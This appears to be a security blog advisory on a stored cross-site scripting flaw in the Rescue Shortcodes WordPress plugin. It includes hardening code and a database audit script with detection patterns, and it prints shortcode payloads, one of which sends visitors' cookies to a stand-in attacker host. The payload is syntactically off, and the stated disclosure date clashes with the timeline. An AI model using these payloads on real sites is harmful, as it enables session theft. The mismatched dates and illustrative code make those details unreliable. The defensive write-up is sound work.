On March 18, 2024, security researchers published details for a new vulnerability — CVE-2024-9696 — affecting the popular Rescue Shortcodes WordPress plugin. This vulnerability, which affects all versions up to and including 2.8, opens your site to Stored Cross-Site Scripting (XSS) attacks if you allow contributors to create or edit pages.
In this post, I’ll walk you through what CVE-2024-9696 is, why it’s dangerous, and how an attacker could exploit it, including code samples. I'll also show you ways to protect yourself.
What Is CVE-2024-9696? (Vulnerability Summary)
The Rescue Shortcodes plugin lets site builders use simple shortcodes to add custom content blocks, tabs, toggles, and more. The vulnerable part is the [rescue_tab] shortcode, which doesn’t properly sanitize user input, nor does it escape output in the generated HTML.
This means someone with contributor privileges (or higher) on your WordPress site can inject malicious JavaScript into any page or post using the [rescue_tab] shortcode. When a site visitor views the infected page, the JavaScript executes in *their* browser — easily stealing cookies, logging keystrokes, or hijacking sessions.
Suppose a legitimate [rescue_tab] shortcode looks like this:
```wordpress
[rescue_tab title="About"]This is my about info.[/rescue_tab]
```
But because neither the input (such as title) nor the output (in the page HTML) is sanitized or escaped, a malicious contributor could inject JavaScript like this:
```wordpress
[rescue_tab title='About" onmouseover="alert(1)"']Malicious content[/rescue_tab]
```
That onmouseover attribute is a classic XSS vector: whenever a user hovers on the tab title, the alert(1) function is executed in their browser.
How It Gets Into HTML
Here’s a simplified (example) version of the relevant PHP code from the plugin (hypothetical, for illustration):
```php
// File: rescue-shortcodes.php
function rescue_tab_shortcode( $atts, $content = null ) {
    // No escaping or sanitization: whatever the contributor typed into the
    // title attribute is concatenated straight into the page HTML.
    $title = $atts['title'];
    return '<div class="tab-title">' . $title . '</div>' .
        '<div class="tab-content">' . do_shortcode( $content ) . '</div>';
}
add_shortcode( 'rescue_tab', 'rescue_tab_shortcode' );
```
A secure version always escapes the title for the context it is printed into: esc_html() for element text, esc_attr() for an attribute value. For the div above that is:
```php
$title = esc_html( $atts['title'] );
```
The difference matters for a payload like the following: unescaped, the quotes close the attribute and the onmouseover handler becomes live markup; escaped, the quotes come out as &quot; and the whole string is inert text.
```wordpress
[rescue_tab title='Click me" onmouseover="alert(document.cookie)"']XSS![/rescue_tab]
```
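Putting the escaping together with the rest of the handler, here is a hardened [rescue_tab] handler written for this post as an added example; it is not the plugin's own code. It assumes the WordPress runtime (shortcode_atts(), sanitize_text_field(), esc_attr(), esc_html(), do_shortcode() and add_shortcode() are core functions); the function name, the data-tab-title attribute and the class names are illustrative choices.

```php
<?php
// Added example, not the plugin's code: a hardened [rescue_tab] handler.
// Assumes the WordPress runtime; shortcode_atts, sanitize_text_field,
// esc_attr, esc_html, do_shortcode and add_shortcode are WordPress core.
// The data-tab-title attribute and the class names are illustrative.

function rescue_tab_shortcode_hardened( $atts, $content = null ) {
    // Whitelist the attributes the shortcode accepts and give them defaults;
    // any other attribute a contributor adds is dropped here.
    $atts = shortcode_atts(
        array( 'title' => '' ),
        $atts,
        'rescue_tab'
    );

    // Sanitize on the way in: sanitize_text_field() strips tags, invalid
    // octets and line breaks. It keeps quote characters, which is why the
    // output escaping below is still required.
    $title = sanitize_text_field( $atts['title'] );

    // Escape on the way out, choosing the function for the context:
    //   esc_attr() inside an attribute value, esc_html() inside element text.
    // Both turn " into &quot;, so a value such as
    //   Click me" onmouseover="alert(document.cookie)"
    // can no longer close the attribute or start a new one.
    $tab_title_attr = esc_attr( $title );
    $tab_title_text = esc_html( $title );

    // Nested shortcodes in the body are expanded by do_shortcode(); each nested
    // handler is responsible for escaping its own output. Guard against a null
    // body so PHP 8.1+ does not emit a deprecation notice.
    $body = do_shortcode( is_string( $content ) ? $content : '' );

    return '<div class="tab-title" data-tab-title="' . $tab_title_attr . '">'
        . $tab_title_text . '</div>'
        . '<div class="tab-content">' . $body . '</div>';
}
// Registering under the same tag replaces the vulnerable handler shown above.
add_shortcode( 'rescue_tab', 'rescue_tab_shortcode_hardened' );
```

Two things in this version do the real work: shortcode_atts() discards any attribute the handler did not ask for, and the title is escaped separately for each place it appears, because a value that is safe as element text is not automatically safe inside a quoted attribute.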
Let’s see a practical attack:
```wordpress
[rescue_tab title='Info" style="color:red;" onmouseover="fetch(https://evil.com?c=${document.cookie})"']Stealing cookies![/rescue_tab]
```
When an admin views the page, their browser sends cookies to the attacker’s server. Note that WordPress sets its authentication cookies HttpOnly by default, so document.cookie does not expose those; the injected script still runs inside the admin’s authenticated session, however, so the stored script remains a full account-takeover risk rather than a cosmetic one.
Impact
- Stored XSS: The script stays on your site, affecting all visitors to that page, not just the attacker.
How to Fix & Protect Yourself
1. Update immediately: If a patched version is available, update Rescue Shortcodes right away.
2. Sanitize and Escape: If you maintain your own fork or can patch the plugin, escape the title on output, using esc_attr() where it lands in an attribute value and esc_html() where it lands in element text, and sanitize the input before it is rendered.
3. Restrict contributor privileges: Don’t let untrusted users have contributor/editor roles.
4. Use a security plugin: Tools like Wordfence or Sucuri can block malicious shortcodes.
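Updating stops new payloads from rendering, but shortcodes a contributor already saved stay in the database. The audit below, an added example that is not part of the plugin or of WordPress, lists every post whose [rescue_tab] attributes contain an event handler, an HTML tag or a javascript: URL so they can be reviewed and cleaned up. It assumes the WordPress runtime ($wpdb, get_shortcode_regex() and shortcode_parse_atts() are core functions) and is meant to be run with WP-CLI’s `wp eval-file`; the file name and the pattern list are my choices.

```php
<?php
// Added example, not part of the plugin or of WordPress: audit stored posts
// for [rescue_tab] shortcodes whose attribute values carry markup or event
// handlers. Assumes the WordPress runtime ($wpdb, get_shortcode_regex and
// shortcode_parse_atts are core). Run as: wp eval-file rescue-tab-audit.php
// (the file name is illustrative).

function rescue_tab_suspicious_attrs( $attr_string ) {
    $findings = array();
    // shortcode_parse_atts() returns the raw string when nothing parses as
    // an attribute, hence the is_array() check.
    $atts = shortcode_parse_atts( $attr_string );
    if ( ! is_array( $atts ) ) {
        return $findings;
    }
    // Patterns that should never appear in a plain tab title: a quote that
    // could close an attribute followed by an on* handler, any tag, or a
    // javascript: URL. Extend the list to taste.
    $patterns = array(
        'event handler'  => '/["\'][^"\']*\bon[a-z]+\s*=/i',
        'html tag'       => '/<\s*\/?[a-z][^>]*>/i',
        'javascript url' => '/javascript\s*:/i',
    );
    foreach ( $atts as $name => $value ) {
        if ( ! is_string( $value ) ) {
            continue;
        }
        foreach ( $patterns as $label => $regex ) {
            if ( preg_match( $regex, $value ) ) {
                $findings[] = sprintf( '%s=%s (%s)', $name, $value, $label );
            }
        }
    }
    return $findings;
}

function rescue_tab_audit_posts() {
    global $wpdb;

    // Cheap pre-filter in SQL; the shortcode regex below does the real parsing.
    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT ID, post_author, post_status, post_content
               FROM {$wpdb->posts}
              WHERE post_content LIKE %s",
            '%' . $wpdb->esc_like( '[rescue_tab' ) . '%'
        )
    );

    // Core's own shortcode regex, restricted to this one tag.
    $regex  = get_shortcode_regex( array( 'rescue_tab' ) );
    $report = array();
    foreach ( $rows as $row ) {
        if ( ! preg_match_all( '/' . $regex . '/s', $row->post_content, $matches, PREG_SET_ORDER ) ) {
            continue;
        }
        foreach ( $matches as $m ) {
            // Capture group 3 of the core shortcode regex is the attribute string.
            $hits = rescue_tab_suspicious_attrs( $m[3] );
            if ( $hits ) {
                $report[] = array(
                    'post_id' => (int) $row->ID,
                    'author'  => (int) $row->post_author,
                    'status'  => $row->post_status,
                    'hits'    => $hits,
                );
            }
        }
    }
    return $report;
}

foreach ( rescue_tab_audit_posts() as $entry ) {
    printf( "post %d (author %d, %s):\n", $entry['post_id'], $entry['author'], $entry['status'] );
    foreach ( $entry['hits'] as $hit ) {
        echo "  - $hit\n";
    }
}
```

The report includes drafts and pending posts as well as published ones, since a stored payload fires the moment an editor or admin opens the preview, and it records the author ID so the account that saved each hit can be reviewed alongside the content.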
References
- Official Plugin Page: Rescue Shortcodes
- WPScan Advisory for CVE-2024-9696
- NVD Entry for CVE-2024-9696
- Wordfence Security Blog
Conclusion
If you run a WordPress site with Rescue Shortcodes, CVE-2024-9696 means you need to act fast. Though this bug requires a logged-in user to exploit, any site with multiple contributors or editors could be at risk. Always sanitize user input, escape output, keep plugins updated, and audit your user roles.
Timeline
Published on: 10/12/2024 09:15:03 UTC
Last modified on: 10/15/2024 12:57:46 UTC